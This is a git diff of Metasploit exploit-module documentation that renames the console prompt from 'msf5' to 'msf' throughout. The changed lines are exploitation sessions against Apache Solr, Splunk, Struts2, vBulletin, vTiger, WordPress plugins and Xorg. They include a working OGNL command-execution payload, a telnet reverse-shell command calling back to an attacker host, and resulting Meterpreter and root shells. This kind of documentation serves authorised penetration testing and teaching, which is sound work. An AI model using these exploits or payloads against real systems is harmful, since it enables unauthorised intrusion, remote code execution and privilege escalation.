b/documentation/modules/exploit/multi/http/solr_velocity_rce.md @@ -57,16 +57,16 @@ Windows systems have 3 targets: ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using PowerShell ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 RHOSTS => 192.168.137.132 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 2 TARGET => 2 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 @@ -90,16 +90,16 @@ meterpreter > ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 RHOSTS => 192.168.137.132 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 3 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 3 TARGET => 3 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 @@ -138,18 +138,18 @@ meterpreter > ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, with payload `cmd/windows/generic` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 RHOSTS => 192.168.137.132 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 4 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 4 TARGET => 4 -msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami +msf exploit(multi/http/solr_velocity_rce) > set CMD whoami CMD => whoami -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Found Apache Solr 8.3.0 [*] OS version is Windows Server 2019 amd64 10.0 @@ -157,27 +157,27 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit [*] Targeting core 'techproducts' [+] 2k19dtctr\administrator [*] Exploit completed, but no session was created. -msf5 exploit(multi/http/solr_velocity_rce) > +msf exploit(multi/http/solr_velocity_rce) > ``` ### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/reverse_bash` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 RHOSTS => 192.168.137.129 -msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80 +msf exploit(multi/http/solr_velocity_rce) > set RPORT 80 RPORT => 80 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 0 TARGET => 0 -msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user +msf exploit(multi/http/solr_velocity_rce) > set USERNAME user USERNAME => user -msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 +msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 PASSWORD => j6lzH82e6Jc5 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 @@ -192,24 +192,24 @@ uid=999(solr) gid=1002(solr) groups=1002(solr) ### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/generic` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 RHOSTS => 192.168.137.129 -msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80 +msf exploit(multi/http/solr_velocity_rce) > set RPORT 80 RPORT => 80 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 0 TARGET => 0 -msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user +msf exploit(multi/http/solr_velocity_rce) > set USERNAME user USERNAME => user -msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 +msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 PASSWORD => j6lzH82e6Jc5 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami +msf exploit(multi/http/solr_velocity_rce) > set CMD whoami CMD => whoami -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 @@ -218,27 +218,27 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit [*] Targeting core 'techproducts' [+] solr [*] Exploit completed, but no session was created. -msf5 exploit(multi/http/solr_velocity_rce) > +msf exploit(multi/http/solr_velocity_rce) > ``` ### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager, with payload `linux/x86/meterpreter/reverse_tcp` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 RHOSTS => 192.168.137.129 -msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80 +msf exploit(multi/http/solr_velocity_rce) > set RPORT 80 RPORT => 80 -msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user +msf exploit(multi/http/solr_velocity_rce) > set USERNAME user USERNAME => user -msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 +msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 PASSWORD => j6lzH82e6Jc5 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 1 TARGET => 1 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 1801c0168f..39e72013c3 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -50,12 +50,12 @@ This module has been tested successfully against: ### Tested against 7.2.4 running on OSX 10.14.3 ``` -msf5 exploit(multi/http/splunk_upload_app_exec) > -msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 +msf exploit(multi/http/splunk_upload_app_exec) > +msf exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 RHOST => 172.16.165.1 -msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk +msf exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk password => splunksplunk -msf5 exploit(multi/http/splunk_upload_app_exec) > show targets +msf exploit(multi/http/splunk_upload_app_exec) > show targets Exploit targets: @@ -69,9 +69,9 @@ Exploit targets: 5 Splunk >= 5.0.1 / Windows -msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 +msf exploit(multi/http/splunk_upload_app_exec) > set target 3 target => 3 -msf5 exploit(multi/http/splunk_upload_app_exec) > exploit +msf exploit(multi/http/splunk_upload_app_exec) > exploit [*] Started reverse TCP double handler on 172.16.165.206:4444 [*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' diff --git a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md index e27ad3ef7d..0c1caed269 100644 --- a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md @@ -123,42 +123,42 @@ Checking a vulnerable endpoint, as installed in the above steps: ``` msf > use exploit/multi/http/struts_namespace_ognl -msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135 -msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771 -msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action +msf exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135 +msf exploit(multi/http/struts_namespace_ognl) > set RPORT 32771 +msf exploit(multi/http/struts_namespace_ognl) > set ACTION help.action ACTION => help.action -msf5 exploit(multi/http/struts_namespace_ognl) > check +msf exploit(multi/http/struts_namespace_ognl) > check [+] 192.168.199.135:32771 The target is vulnerable. ``` Running an arbitrary command on the above-described environment: ``` -msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true -msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic +msf exploit(multi/http/struts_namespace_ognl) > set VERBOSE true +msf exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic PAYLOAD => cmd/unix/generic -msf5 exploit(multi/http/struts_namespace_ognl) > set CMD hostname +msf exploit(multi/http/struts_namespace_ognl) > set CMD hostname CMD => hostname -msf5 exploit(multi/http/struts_namespace_ognl) > run +msf exploit(multi/http/struts_namespace_ognl) > run [*] Submitted OGNL: (#_memberAccess['allowStaticMethodAccess']=true).(#cmd='hostname').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush()) [*] Command ran. Output from command: b3d9b350d9b6 [*] Exploit completed, but no session was created. -msf5 exploit(multi/http/struts_namespace_ognl) > +msf exploit(multi/http/struts_namespace_ognl) > ``` Getting a Meterpreter session on the above-described environment: ``` -msf5 > use exploit/multi/http/struts2_namespace_ognl -msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action -msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135 -msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771 -msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 -msf5 exploit(multi/http/struts2_namespace_ognl) > run +msf > use exploit/multi/http/struts2_namespace_ognl +msf exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action +msf exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135 +msf exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771 +msf exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +msf exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 +msf exploit(multi/http/struts2_namespace_ognl) > run [*] Started reverse TCP handler on 192.168.199.134:4444 [+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root diff --git a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md index 5b39ecf7fb..8965b0d9d8 100644 --- a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md +++ b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md @@ -108,17 +108,17 @@ The base URI path of vBulletin. **Default: /** ## Scenarios ``` -msf5 > use exploit/multi/http/vbulletin_getindexablecontent -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set RHOSTS vb.local +msf > use exploit/multi/http/vbulletin_getindexablecontent +msf exploit(multi/http/vbulletin_getindexablecontent) > set RHOSTS vb.local RHOSTS => vb.local -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set VHOST vb.local +msf exploit(multi/http/vbulletin_getindexablecontent) > set VHOST vb.local VHOST => vb.local -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set TARGETURI /vb5 +msf exploit(multi/http/vbulletin_getindexablecontent) > set TARGETURI /vb5 TARGETURI => /vb5 -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set PAYLOAD 2 -msf5 exploit(multi/http/vbulletin_getindexablecontent) > check +msf exploit(multi/http/vbulletin_getindexablecontent) > set PAYLOAD 2 +msf exploit(multi/http/vbulletin_getindexablecontent) > check [*] 192.168.1.100:80 - The target appears to be vulnerable. -msf5 exploit(multi/http/vbulletin_getindexablecontent) > run +msf exploit(multi/http/vbulletin_getindexablecontent) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. diff --git a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md index 29a3f0b633..f41db2deaa 100755 --- a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md +++ b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md @@ -44,11 +44,11 @@ Override check result. A proof of concept was originally published on [seclist.org](https://seclists.org/fulldisclosure/2019/Sep/31). ``` -msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25 +msf exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25 rhosts => 192.168.1.25 -msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13 +msf exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13 lhost => 192.168.1.13 -msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > run +msf exploit(multi/http/vbulletin_widgetconfig_rce) > run [*] Started reverse TCP handler on 192.168.1.13:4444 [*] Sending php/meterpreter/reverse_tcp command payload diff --git a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md index 2f40d27d6f..6ad92f78e1 100644 --- a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md +++ b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md @@ -31,14 +31,14 @@ Default: true ### VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10) ``` -msf5 > use exploit/multi/http/vtiger_logo_upload_exec -msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175 +msf > use exploit/multi/http/vtiger_logo_upload_exec +msf exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175 rhosts => 172.22.222.175 -msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899 +msf exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899 rport => 8899 -msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin +msf exploit(multi/http/vtiger_logo_upload_exec) > set password admin password => admin -msf5 exploit(multi/http/vtiger_logo_upload_exec) > run +msf exploit(multi/http/vtiger_logo_upload_exec) > run [*] Started reverse TCP handler on 172.22.222.121:4444 [*] Uploading payload: KpXAXQNKjN.php diff --git a/documentation/modules/exploit/multi/http/wp_crop_rce.md b/documentation/modules/exploit/multi/http/wp_crop_rce.md index 15e084c29d..0ce2bca4fe 100644 --- a/documentation/modules/exploit/multi/http/wp_crop_rce.md +++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md @@ -35,14 +35,14 @@ the theme cannot be auto-detected. ### Ubuntu 18.04 running WordPress 4.9.8 ``` -msf5 > use exploit/multi/http/wp_crop_rce -msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1 +msf > use exploit/multi/http/wp_crop_rce +msf exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/http/wp_crop_rce) > set username author +msf exploit(multi/http/wp_crop_rce) > set username author username => author -msf5 exploit(multi/http/wp_crop_rce) > set password author +msf exploit(multi/http/wp_crop_rce) > set password author password => author -msf5 exploit(multi/http/wp_crop_rce) > run +msf exploit(multi/http/wp_crop_rce) > run [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Authenticating with WordPress using author:author... diff --git a/documentation/modules/exploit/multi/http/wp_db_backup_rce.md b/documentation/modules/exploit/multi/http/wp_db_backup_rce.md index a3dde99ffc..ba8593f67f 100644 --- a/documentation/modules/exploit/multi/http/wp_db_backup_rce.md +++ b/documentation/modules/exploit/multi/http/wp_db_backup_rce.md @@ -30,17 +30,17 @@ ### Tested on wp-database-backup v4.6.5 running Wordpress 5.1 on Ubuntu 18.04 ``` - msf5 exploit(multi/http/wp_db_backup_rce) > set target 1 + msf exploit(multi/http/wp_db_backup_rce) > set target 1 target => 1 - msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147 + msf exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147 rhosts => 192.168.37.147 - msf5 exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp + msf exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp - msf5 exploit(multi/http/wp_db_backup_rce) > check + msf exploit(multi/http/wp_db_backup_rce) > check [*] Version of wp-database-backup detected: 4.6 [*] 192.168.37.147:80 - The target appears to be vulnerable. - msf5 exploit(multi/http/wp_db_backup_rce) > run + msf exploit(multi/http/wp_db_backup_rce) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [+] Reached the wp-database-backup settings page @@ -64,22 +64,22 @@ ### Tested on wp-database-backup v4.6.5 running Wordpress 5.2 on Windows 10 ``` - msf5 > use exploit/multi/http/wp_db_backup_rce - msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144 + msf > use exploit/multi/http/wp_db_backup_rce + msf exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144 rhosts => 192.168.37.144 - msf5 exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp + msf exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(multi/http/wp_db_backup_rce) > set username user + msf exploit(multi/http/wp_db_backup_rce) > set username user username => user - msf5 exploit(multi/http/wp_db_backup_rce) > set password password + msf exploit(multi/http/wp_db_backup_rce) > set password password password => password - msf5 exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1 + msf exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/http/wp_db_backup_rce) > check + msf exploit(multi/http/wp_db_backup_rce) > check [*] Version of wp-database-backup detected: 4.6 [*] 192.168.37.144:80 - The target appears to be vulnerable. - msf5 exploit(multi/http/wp_db_backup_rce) > run + msf exploit(multi/http/wp_db_backup_rce) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [+] Reached the wp-database-backup settings page diff --git a/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md b/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md index 10d3832cd9..3034579449 100644 --- a/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md +++ b/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md @@ -23,18 +23,18 @@ ### Test on Windows 7 x86 running WordPress v4.9.7 ``` - msf5 > use exploit/multi/http/wp_responsive_thumbnail_slider_upload - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165 + msf > use exploit/multi/http/wp_responsive_thumbnail_slider_upload + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165 rhosts => 192.168.37.165 - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress targeturi => wordpress - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test username => test - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password password => password - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check [*] 192.168.37.165:80 The target service is running, but could not be validated. - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] WordPress accessed diff --git a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md index d66fb2ccb0..ae65e89cbf 100644 --- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md +++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md @@ -56,14 +56,14 @@ Will check for console lock under linux (default: `true`) ### OpenBSD ``` -msf5 > use exploit/multi/local/xorg_x11_suid_server -msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +msf > use exploit/multi/local/xorg_x11_suid_server +msf exploit(multi/local/xorg_x11_suid_server) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2 +msf exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2 lhost => 172.30.0.2 -msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true +msf exploit(multi/local/xorg_x11_suid_server) > set verbose true verbose => true -msf5 exploit(multi/local/xorg_x11_suid_server) > run +msf exploit(multi/local/xorg_x11_suid_server) > run [!] SESSION may not be compatible with this module. [*] Started reverse double SSL handler on 172.30.0.2:4444 @@ -100,14 +100,14 @@ uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), ### CentOS 7.4.1708 x86_64 ``` -msf5 > use exploit/multi/local/xorg_x11_suid_server -msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +msf > use exploit/multi/local/xorg_x11_suid_server +msf exploit(multi/local/xorg_x11_suid_server) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 +msf exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true +msf exploit(multi/local/xorg_x11_suid_server) > set verbose true verbose => true -msf5 exploit(multi/local/xorg_x11_suid_server) > run +msf exploit(multi/local/xorg_x11_suid_server) > run [*] Started reverse double SSL handler on 172.16.191.188:4444 [*] Running additional check for Linux @@ -147,14 +147,14 @@ Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 ### Red Hat Enterprise Linux 7.5 x86_64 ``` -msf5 > use exploit/multi/local/xorg_x11_suid_server -msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +msf > use exploit/multi/local/xorg_x11_suid_server +msf exploit(multi/local/xorg_x11_suid_server) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 +msf exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true +msf exploit(multi/local/xorg_x11_suid_server) > set verbose true verbose => true -msf5 exploit(multi/local/xorg_x11_suid_server) > run +msf exploit(multi/local/xorg_x11_suid_server) > run [*] Started reverse double SSL handler on 172.16.191.165:4444 [*] Running additional check for Linux diff --git a/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md b/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md index ac8ebccb2d..e78f54fd80 100644 --- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md +++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md @@ -40,7 +40,7 @@ Xorg shared object name for modulepath (default: `libglx.so`) ### Xorg `v1.19.3` on Centos 7.4 ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] Sending stage (816260 bytes) to 172.16.215.159 @@ -56,16 +56,16 @@ BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1 +msf exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 lhost => 172.16.215.1 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > check [+] The target is vulnerable. -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [+] Passed all initial checks for exploit @@ -90,7 +90,7 @@ Meterpreter : x64/linux ### Xorg `v1.19.5` on Solaris 11.4 ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:49722) at 2019-10-22 09:27:45 -0500 @@ -103,20 +103,20 @@ background Background session 3? [y/N] y -msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh +msf exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh payload => cmd/unix/reverse_ksh -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 lhost => 172.16.215.1 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3 session => 3 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2 target => 2 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > check [!] SESSION may not be compatible with this module. [+] The target is vulnerable. -msf5 